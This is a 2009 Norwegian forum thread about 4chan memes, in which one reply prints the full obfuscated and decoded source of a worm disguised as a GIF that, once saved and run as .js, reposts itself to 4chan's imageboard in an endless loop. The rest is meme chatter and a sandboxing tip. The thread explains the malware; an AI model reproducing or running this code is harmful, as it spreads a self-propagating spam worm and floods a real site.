4chan bilete- og diskusjonstråd

[kris98]

Noen som vet hva viruset gjør? Evt. har kildekode.

Sikkert flere typer, blandt annet noen som setter igang et DOS-angrep mot 4chan eller andre.

[Inaktivbruker_101125]

... som utfolder seg til et DDoS-angrep ...

 

Men ja, .js filen er et virus. Har tilogmed kildekoden til så og si alle de forskjellige, de ligger fritt ute på nettet. Hint: ED

Endret 22. september 2009 av The Prophet

[Nopros]

Noen som vet hva viruset gjør? Evt. har kildekode.

Skal jeg teste? Hadde jeg ikke vært redd for barneporno kunne jeg sikkert gjort det

[kris98]

Noen som vet hva viruset gjør? Evt. har kildekode.

Skal jeg teste? Hadde jeg ikke vært redd for barneporno kunne jeg sikkert gjort det

 

[L4r5]

Noen som vet hva viruset gjør? Evt. har kildekode.

Skal jeg teste? Hadde jeg ikke vært redd for barneporno kunne jeg sikkert gjort det

Ja. Kjør det på en ren maskin ut mot et simulert internett og så kjører du portspeiling på den aktuelle porten sånn at du kan se trafikken med en protokollanalysator på en annen maskin. Da kan du gjøre det trygt uten at du risikerer noen ting.

[Nopros]

Neh, minnepinnen er to etasjer ned og jeg har noen viktige skoleting på denne pcn

 

 

Ja. Kjør det på en ren maskin ut mot et simulert internett og så kjører du portspeiling på den aktuelle porten sånn at du kan se trafikken med en protokollanalysator på en annen maskin. Da kan du gjøre det trygt uten at du risikerer noen ting.

Hørrtes lurt ut, men i og med at jeg ikke skjønte en dritt, så lot jeg være

[Matsemann]

Man kan da lese .js filen rett av for å si hva den gjør. I seg selv er den ikke noe mer enn tekst. De kan så klart ha obfuskert koden, da.

[Inaktivbruker_101125]

Den er 'kryptert'/obfuskert ja, ikke ren JS.

[Nopros]

Nå finner jeg ikke en grå boks nå

[Unhealer]

Morsomt for dem med 4chan humor, som samtidig ser Mock The Week.

 

[Toast Is Pimp!]

Utrulig! Nå finnes det jo folk i alle IQ klasser på 4chan.

Edit: Øh, glemte meg helt der. Har jo vært det siden begynnelsen.

Endret 23. september 2009 av Toast Is Pimp!

[Gavekort]

[A-Jay]

Noen som vet hva viruset gjør? Evt. har kildekode.

 

Selve GIF-filen (som altså skal kjøres som .js) inneholder blant annet:

 

 

function GIF89a(){}eval(unescape('\x78\x3d\x57\x53\x48\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x4d\x73\x78\x6d\x6c\x32\x2e\x78\x6d\x6c\x68\x74\x74\x70\x22\x29\x0d\x0a\x66\x73\x6f\x3d\x57\x53\x48\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x73\x63\x72\x69\x70\x74\x69\x6e\x67\x2e\x66\x69\x6c\x65\x73\x79\x73\x74\x65\x6d\x6f\x62\x6a\x65\x63\x74\x22\x29\x0d\x0a\x77\x73\x68\x3d\x57\x53\x48\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x57\x73\x63\x72\x69\x70\x74\x2e\x73\x68\x65\x6c\x6c\x22\x29\x0d\x0a\x77\x73\x68\x2e\x63\x75\x72\x72\x65\x6e\x74\x64\x69\x72\x65\x63\x74\x6f\x72\x79\x3d\x66\x73\x6f\x2e\x67\x65\x74\x73\x70\x65\x63\x69\x61\x6c\x66\x6f\x6c\x64\x65\x72\x28\x32\x29\x0d\x0a\x67\x68\x6a\x3d\x66\x73\x6f\x2e\x63\x72\x65\x61\x74\x65\x74\x65\x78\x74\x66\x69\x6c\x65\x28\x22\x53\x44\x4b\x48\x64\x73\x22\x29\x3b\x67\x68\x6a\x2e\x77\x72\x69\x74\x65\x28\x22\x6c\x6f\x6c\x22\x29\x0d\x0a\x0d\x0a\x66\x73\x6f\x2e\x63\x6f\x70\x79\x66\x69\x6c\x65\x28\x57\x53\x48\x2e\x73\x63\x72\x69\x70\x74\x66\x75\x6c\x6c\x6e\x61\x6d\x65\x2c\x22\x32\x22\x29\x0d\x0a\x0d\x0a\x6d\x73\x67\x3d\x22\x31\x2e\x20\x4f\x70\x65\x6e\x20\x74\x68\x69\x73\x20\x69\x6d\x61\x67\x65\x2e\x5c\x6e\x32\x2e\x20\x54\x68\x65\x20\x69\x6d\x61\x67\x65\x20\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x64\x69\x73\x70\x6c\x61\x79\x65\x64\x2e\x5c\x6e\x33\x2e\x20\x53\x61\x76\x65\x20\x69\x74\x20\x61\x73\x20\x34\x63\x68\x61\x6e\x2e\x6a\x73\x5c\x6e\x34\x2e\x20\x4f\x70\x65\x6e\x20\x74\x68\x65\x20\x66\x69\x6c\x65\x20\x79\x6f\x75\x20\x73\x61\x76\x65\x64\x2e\x5c\x6e\x35\x2e\x20\x53\x48\x49\x54\x20\x42\x52\x49\x43\x4b\x53\x22\x0d\x0a\x0d\x0a\x6e\x3d\x30\x0d\x0a\x77\x68\x69\x6c\x65\x28\x31\x29\x7b\x0d\x0a\x6e\x2b\x2b\x0d\x0a\x63\x3d\x6d\x73\x67\x2b\x22\x5c\x6e\x5c\x6e\x22\x2b\x6e\x0d\x0a\x78\x2e\x6f\x70\x65\x6e\x28\x22\x67\x65\x74\x22\x2c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x6d\x67\x2e\x34\x63\x68\x61\x6e\x2e\x6f\x72\x67\x2f\x62\x2f\x3f\x22\x2b\x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x2c\x30\x29\x0d\x0a\x78\x2e\x73\x65\x6e\x64\x28\x29\x0d\x0a\x74\x3d\x78\x2e\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x65\x78\x74\x2e\x6d\x61\x74\x63\x68\x28\x2f\x3c\x73\x70\x61\x6e\x20\x69\x64\x3d\x22\x6e\x6f\x74\x68\x72\x65\x61\x64\x5c\x64\x2b\x2f\x67\x29\x0d\x0a\x74\x3d\x74\x5b\x4d\x61\x74\x68\x2e\x66\x6c\x6f\x6f\x72\x28\x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x2a\x74\x2e\x6c\x65\x6e\x67\x74\x68\x29\x5d\x2e\x6d\x61\x74\x63\x68\x28\x2f\x5c\x64\x2b\x2f\x29\x5b\x30\x5d\x0d\x0a\x62\x3d\x28\x22\x22\x2b\x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x29\x2e\x73\x75\x62\x73\x74\x72\x28\x32\x29\x0d\x0a\x73\x3d\x22\x5c\x6e\x2d\x2d\x22\x2b\x62\x2b\x22\x5c\x6e\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x64\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x6e\x61\x6d\x65\x3d\x22\x0d\x0a\x73\x3d\x73\x2b\x22\x72\x65\x73\x74\x6f\x5c\x6e\x5c\x6e\x22\x2b\x74\x2b\x73\x2b\x22\x63\x6f\x6d\x5c\x6e\x5c\x6e\x22\x2b\x63\x2b\x73\x2b\x22\x75\x70\x66\x69\x6c\x65\x3b\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x2b\x6e\x2b\x22\x2e\x67\x67\x67\x5c\x6e\x5c\x6e\x22\x0d\x0a\x76\x61\x72\x20\x66\x31\x3d\x66\x73\x6f\x2e\x63\x72\x65\x61\x74\x65\x74\x65\x78\x74\x66\x69\x6c\x65\x28\x22\x31\x22\x29\x0d\x0a\x66\x31\x2e\x77\x72\x69\x74\x65\x28\x73\x29\x0d\x0a\x66\x31\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0d\x0a\x73\x3d\x22\x5c\x6e\x2d\x2d\x22\x2b\x62\x2b\x22\x5c\x6e\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x64\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x6e\x61\x6d\x65\x3d\x22\x0d\x0a\x73\x3d\x22\x5c\x30\x22\x2b\x6e\x2b\x73\x2b\x22\x6d\x6f\x64\x65\x5c\x6e\x5c\x6e\x72\x65\x67\x69\x73\x74\x22\x0d\x0a\x76\x61\x72\x20\x66\x33\x3d\x66\x73\x6f\x2e\x63\x72\x65\x61\x74\x65\x74\x65\x78\x74\x66\x69\x6c\x65\x28\x22\x33\x22\x29\x0d\x0a\x66\x33\x2e\x77\x72\x69\x74\x65\x28\x73\x29\x0d\x0a\x66\x33\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0d\x0a\x77\x73\x68\x2e\x72\x75\x6e\x28\x22\x43\x4d\x44\x20\x2f\x43\x20\x63\x6f\x70\x79\x2f\x42\x20\x31\x2b\x32\x2b\x33\x20\x6f\x6b\x2e\x74\x78\x74\x22\x2c\x30\x2c\x31\x29\x0d\x0a\x76\x61\x72\x20\x61\x3d\x57\x53\x48\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x61\x64\x6f\x64\x62\x2e\x73\x74\x72\x65\x61\x6d\x22\x29\x0d\x0a\x61\x2e\x6d\x6f\x64\x65\x3d\x33\x3b\x61\x2e\x74\x79\x70\x65\x3d\x31\x3b\x61\x2e\x6f\x70\x65\x6e\x28\x29\x0d\x0a\x61\x2e\x6c\x6f\x61\x64\x66\x72\x6f\x6d\x66\x69\x6c\x65\x28\x66\x73\x6f\x2e\x67\x65\x74\x61\x62\x73\x6f\x6c\x75\x74\x65\x70\x61\x74\x68\x6e\x61\x6d\x65\x28\x22\x6f\x6b\x2e\x74\x78\x74\x22\x29\x29\x0d\x0a\x78\x2e\x6f\x70\x65\x6e\x28\x22\x70\x6f\x73\x74\x22\x2c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x64\x61\x74\x2e\x34\x63\x68\x61\x6e\x2e\x6f\x72\x67\x2f\x62\x2f\x69\x6d\x67\x62\x6f\x61\x72\x64\x2e\x70\x68\x70\x22\x2c\x30\x29\x0d\x0a\x78\x2e\x73\x65\x74\x72\x65\x71\x75\x65\x73\x74\x68\x65\x61\x64\x65\x72\x28\x22\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x22\x2c\x22\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x62\x6f\x75\x6e\x64\x61\x72\x79\x3d\x22\x2b\x62\x29\x0d\x0a\x78\x2e\x73\x65\x6e\x64\x28\x61\x29\x0d\x0a\x57\x53\x48\x2e\x73\x6c\x65\x65\x70\x28\x35\x30\x30\x30\x2b\x4d\x61\x74\x68\x2e\x63\x65\x69\x6c\x28\x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x2a\x31\x35\x30\x30\x30\x29\x29\x0d\x0a\x7d'))

 

 

 

Hvis man dekoder heksadesimal-kodene får man:

 

 

 

x=WSH.createobject("Msxml2.xmlhttp")
fso=WSH.createobject("scripting.filesystemobject")
wsh=WSH.createobject("Wscript.shell")
wsh.currentdirectory=fso.getspecialfolder(2)
ghj=fso.createtextfile("SDKHds");ghj.write("lol")

fso.copyfile(WSH.scriptfullname,"2")

msg="1. Open this image.\n2. The image cannot be displayed.\n3. Save it as 4chan.js\n4. Open the file you saved.\n5. SHIT BRICKS"

n=0
while(1){
n++
c=msg+"\n\n"+n
x.open("get","http://img.4chan.org/b/?"+Math.random(),0)
x.send()
t=x.responsetext.match(/<span id="nothread\d+/g)
t=t[Math.floor(Math.random()*t.length)].match(/\d+/)[0]
b=(""+Math.random()).substr(2)
s="\n--"+b+"\ncontent-disposition:form-data;name="
s=s+"resto\n\n"+t+s+"com\n\n"+c+s+"upfile;filename="+n+".ggg\n\n"
var f1=fso.createtextfile("1")
f1.write(s)
f1.close()
s="\n--"+b+"\ncontent-disposition:form-data;name="
s=""+n+s+"mode\n\nregist"
var f3=fso.createtextfile("3")
f3.write(s)
f3.close()
wsh.run("CMD /C copy/B 1+2+3 ok.txt",0,1)
var a=WSH.createobject("adodb.stream")
a.mode=3;a.type=1;a.open()
a.loadfromfile(fso.getabsolutepathname("ok.txt"))
x.open("post","http://dat.4chan.org/b/imgboard.php",0)
x.setrequestheader("Content-type","multipart/form-data;boundary="+b)
x.send(a)
WSH.sleep(5000+Math.ceil(Math.random()*15000))
}

 

 

[Gavekort]

Tusen takk, meget interessant å lese den. 

[Hantypen]

Alle disse bør være gode minner hvis man kaller seg 'oldfag'

Gode gamle dager *savne*

[fox]

Hva er da greier som er for newfag?

[Slimda]

Hmm, hvor var den longcat-tegningen hvor longcat strekte seg over hele universet? laaaangt bilde..

[fox]

hva med å google det?

 

http://images.google.no/images?hl=en&s...sa=N&tab=wi

 

 

 

Endret 24. september 2009 av Fox

[Kris]

Klikk for å se/fjerne innholdet nedenfor

[A-Jay]

Hmm, hvor var den longcat-tegningen hvor longcat strekte seg over hele universet? laaaangt bilde..

Denne?